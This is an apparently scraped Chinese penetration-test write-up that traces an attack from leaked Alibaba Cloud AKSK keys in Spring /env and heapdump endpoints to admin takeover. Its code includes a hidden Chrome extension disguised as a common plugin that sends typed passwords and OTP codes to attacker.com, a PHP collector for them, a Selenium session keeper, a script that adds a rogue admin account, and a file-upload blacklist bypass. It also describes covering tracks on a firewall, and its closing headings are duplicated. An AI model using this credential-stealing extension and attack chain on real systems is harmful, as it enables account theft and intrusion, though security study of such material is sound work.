AKSK 命令执行到谷歌验证码劫持渗透测试技术分析<\/h1>

1. 前言<\/h2>
本文详细分析了一次从阿里云AKSK泄露到最终获取目标系统权限的完整渗透过程，重点介绍了Spring敏感信息泄露、AKSK利用、Chrome插件后门开发、Selenium会话维持等关键技术点。<\/p>

2. 初始信息收集与漏洞发现<\/h2>

2.1 Spring敏感信息泄露<\/h3>

发现目标三级子域名存在Spring接口未授权访问<\/li>
通过\/env<\/code>接口获取多个密码和阿里云AKSK凭证<\/li>
调用heapdump<\/code>接口下载100M+内存转储文件<\/li>

使用MemoryAnalyzer工具分析内存文件，提取：

阿里云AKSK密文<\/li>
内网Redis和Mysql明文密码<\/li>
<\/ul>
<\/li>
<\/ul>
3. 阿里云AKSK利用<\/h2>
3.1 主机发现与评估<\/h3>

使用获取的AKSK检查阿里云资源：

发现十几台主机<\/li>
识别关键主机："xxx-跳板机"(杭州区域)<\/li>
确认该AKSK属于测试网络，但跳板机可能通向生产网<\/li>
<\/ul>
<\/li>
<\/ul>
3.2 命令执行与权限获取<\/h3>

通过AKSK在跳板机执行命令，成功上线Cobalt Strike<\/li>
信息收集发现：

多个管理账号<\/li>
大部分为弱口令(如123456)<\/li>
admin1用户使用Chrome打开目标后台且保存了密码<\/li>
后台受谷歌验证码保护<\/li>
<\/ul>
<\/li>
<\/ul>
3.3 防火墙绕过<\/h3>

发现3389端口受防火墙限制，仅允许公司出口IP访问<\/li>
收集公司出口IP信息<\/li>
临时添加防火墙规则允许跳板机IP访问3389<\/li>
使用后及时删除规则避免被发现<\/li>
<\/ul>
4. Chrome验证码劫持技术<\/h2>
4.1 后门插件开发<\/h3>

开发Chrome扩展后门，伪装为常用插件(如百度统计)<\/li>
功能实现：
\/\/ 监控表单提交事件
<\/span><\/span><\/span><\/span>document.addEventListener<\/span>('submit'<\/span>, captureData<\/span>);
<\/span><\/span>document.addEventListener<\/span>('keypress'<\/span>, function<\/span>(e<\/span>) {
<\/span><\/span>  if<\/span>(e<\/span>.keyCode<\/span> ==<\/span> 13<\/span>) captureData<\/span>();
<\/span><\/span>});
<\/span><\/span>
<\/span><\/span>function<\/span> captureData<\/span>() {
<\/span><\/span>  \/\/ 获取账号、密码和验证码
<\/span><\/span><\/span><\/span>  var<\/span> username<\/span> =<\/span> document.getElementById<\/span>('username'<\/span>).value<\/span>;
<\/span><\/span>  var<\/span> password<\/span> =<\/span> document.getElementById<\/span>('password'<\/span>).value<\/span>;
<\/span><\/span>  var<\/span> code<\/span> =<\/span> document.querySelector<\/span>('[name="code"]'<\/span>).value<\/span>;
<\/span><\/span>
<\/span><\/span>  \/\/ 发送到攻击者服务器
<\/span><\/span><\/span><\/span>  fetch<\/span>('https:\/\/attacker.com\/collect'<\/span>, {
<\/span><\/span>    method<\/span>:<\/span> 'POST'<\/span>,
<\/span><\/span>    body<\/span>:<\/span> JSON<\/span>.stringify<\/span>({u<\/span>:<\/span>username<\/span>, p<\/span>:<\/span>password<\/span>, c<\/span>:<\/span>code<\/span>})
<\/span><\/span>  });
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
4.2 插件隐藏技术<\/h3>

修改插件manifest使其不在扩展栏显示<\/li>
使用常见插件ID和名称降低怀疑<\/li>
<\/ul>
4.3 服务器端接收<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>$data =<\/span> json_decode<\/span>(file_get_contents<\/span>('php:\/\/input'<\/span>), true<\/span>);
<\/span><\/span>file_put_contents<\/span>('info.txt'<\/span>, 
<\/span><\/span>    date<\/span>('Y-m-d H:i:s'<\/span>).<\/span>" - "<\/span>.<\/span>$data['u'<\/span>].<\/span>":"<\/span>.<\/span>$data['p'<\/span>].<\/span>":"<\/span>.<\/span>$data['c'<\/span>].<\/span>"<\/span>\n<\/span>"<\/span>, 
<\/span><\/span>    FILE_APPEND<\/span>);
<\/span><\/span>file_put_contents<\/span>('login.txt'<\/span>, 
<\/span><\/span>    $data['u'<\/span>].<\/span>":"<\/span>.<\/span>$data['p'<\/span>].<\/span>":"<\/span>.<\/span>$data['c'<\/span>]);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>5. Selenium自动化维持<\/h2>
5.1 自动化登录系统<\/h3>
from<\/span> selenium import<\/span> webdriver
<\/span><\/span>import<\/span> time
<\/span><\/span>
<\/span><\/span>def<\/span> check_and_login<\/span>():
<\/span><\/span>    with<\/span> open('login.txt'<\/span>) as<\/span> f:
<\/span><\/span>        creds =<\/span> f.<\/span>read().<\/span>strip().<\/span>split(':'<\/span>)
<\/span><\/span>    
<\/span><\/span>    driver =<\/span> webdriver.<\/span>Chrome()
<\/span><\/span>    driver.<\/span>get("https:\/\/target.com\/login"<\/span>)
<\/span><\/span>    
<\/span><\/span>    # 自动填写凭据<\/span>
<\/span><\/span>    driver.<\/span>find_element_by_name('username'<\/span>).<\/span>send_keys(creds[0<\/span>])
<\/span><\/span>    driver.<\/span>find_element_by_name('password'<\/span>).<\/span>send_keys(creds[1<\/span>])
<\/span><\/span>    driver.<\/span>find_element_by_name('code'<\/span>).<\/span>send_keys(creds[2<\/span>])
<\/span><\/span>    driver.<\/span>find_element_by_tag_name('form'<\/span>).<\/span>submit()
<\/span><\/span>    
<\/span><\/span>    # 维持会话<\/span>
<\/span><\/span>    while<\/span> True<\/span>:
<\/span><\/span>        time.<\/span>sleep(3<\/span>)
<\/span><\/span>        driver.<\/span>refresh()
<\/span><\/span>        # 检查是否仍登录<\/span>
<\/span><\/span>        if<\/span> "login"<\/span> in<\/span> driver.<\/span>current_url:
<\/span><\/span>            break<\/span>
<\/span><\/span><\/code><\/pre>5.2 验证码劫持升级<\/h3>

扩展监控所有表单提交，遍历DOM寻找6位数验证码<\/li>
使用斯坦福大学加密库实现Google Authenticator算法<\/li>
动态生成新用户所需的验证码：
\/\/ 使用新密钥生成验证码
<\/span><\/span><\/span><\/span>var<\/span> newKey<\/span> =<\/span> generateNewSecret<\/span>();
<\/span><\/span>var<\/span> newCode<\/span> =<\/span> generateCode<\/span>(newKey<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ 使用当前用户验证码发起添加用户请求
<\/span><\/span><\/span><\/span>fetch<\/span>('\/api\/addUser'<\/span>, {
<\/span><\/span>  method<\/span>:<\/span> 'POST'<\/span>,
<\/span><\/span>  body<\/span>:<\/span> JSON<\/span>.stringify<\/span>({
<\/span><\/span>    newUser<\/span>:<\/span> 'attacker'<\/span>,
<\/span><\/span>    newKey<\/span>:<\/span> newKey<\/span>,
<\/span><\/span>    newCode<\/span>:<\/span> newCode<\/span>,
<\/span><\/span>    currentCode<\/span>:<\/span> capturedCode<\/span>
<\/span><\/span>  })
<\/span><\/span>});
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
6. 最终突破与权限提升<\/h2>
6.1 文件上传绕过<\/h3>
发现公告发布功能存在黑名单过滤：<\/p>

原始上传 1.php<\/code> → 被删除 → 结果为 1.<\/code><\/li>
变形上传 1.pphp<\/code> → 删除.php → 结果为 1.p<\/code><\/li>
高级变形 1.pphphphpp<\/code> → 删除所有.php → 结果为 1.php<\/code><\/li>
<\/ul>
6.2 权限维持<\/h3>

通过一周的Selenium监控捕获管理员登录<\/li>
自动添加新管理员账户<\/li>
获取持久化访问权限<\/li>
<\/ul>
7. 防御建议<\/h2>
7.1 预防AKSK泄露<\/h3>

避免在Spring等框架中暴露敏感信息<\/li>
定期轮换AKSK<\/li>
使用最小权限原则配置AKSK<\/li>
<\/ul>
7.2 验证码安全<\/h3>

实现验证码一次性使用<\/li>
关键操作要求重新验证<\/li>
监控异常验证请求<\/li>
<\/ul>
7.3 浏览器安全<\/h3>

禁用未经验证的浏览器扩展<\/li>
监控异常网络请求<\/li>
实施内容安全策略(CSP)<\/li>
<\/ul>
7.4 文件上传防护<\/h3>

使用白名单而非黑名单<\/li>
结合文件内容检测<\/li>
上传文件隔离执行<\/li>
<\/ul>
8. 总结<\/h2>
本案例展示了从云服务凭证泄露到最终系统沦陷的完整攻击链，强调了纵深防御的重要性。攻击者通过组合Spring信息泄露、AKSK滥用、浏览器扩展后门、自动化工具等多种技术，最终克服了谷歌验证码等安全措施。防御方需要从多个层面构建防护体系，才能有效抵御此类复杂攻击。<\/p>

AKSK 命令执行到谷歌验证码劫持渗透测试技术分析<\/h1>

1. 前言<\/h2> 本文详细分析了一次从阿里云AKSK泄露到最终获取目标系统权限的完整渗透过程，重点介绍了Spring敏感信息泄露、AKSK利用、Chrome插件后门开发、Selenium会话维持等关键技术点。<\/p>

2. 初始信息收集与漏洞发现<\/h2>

3. 阿里云AKSK利用<\/h2>

4. Chrome验证码劫持技术<\/h2>

5. Selenium自动化维持<\/h2>

6. 最终突破与权限提升<\/h2>

7. 防御建议<\/h2>

1. 前言<\/h2>
本文详细分析了一次从阿里云AKSK泄露到最终获取目标系统权限的完整渗透过程，重点介绍了Spring敏感信息泄露、AKSK利用、Chrome插件后门开发、Selenium会话维持等关键技术点。<\/p>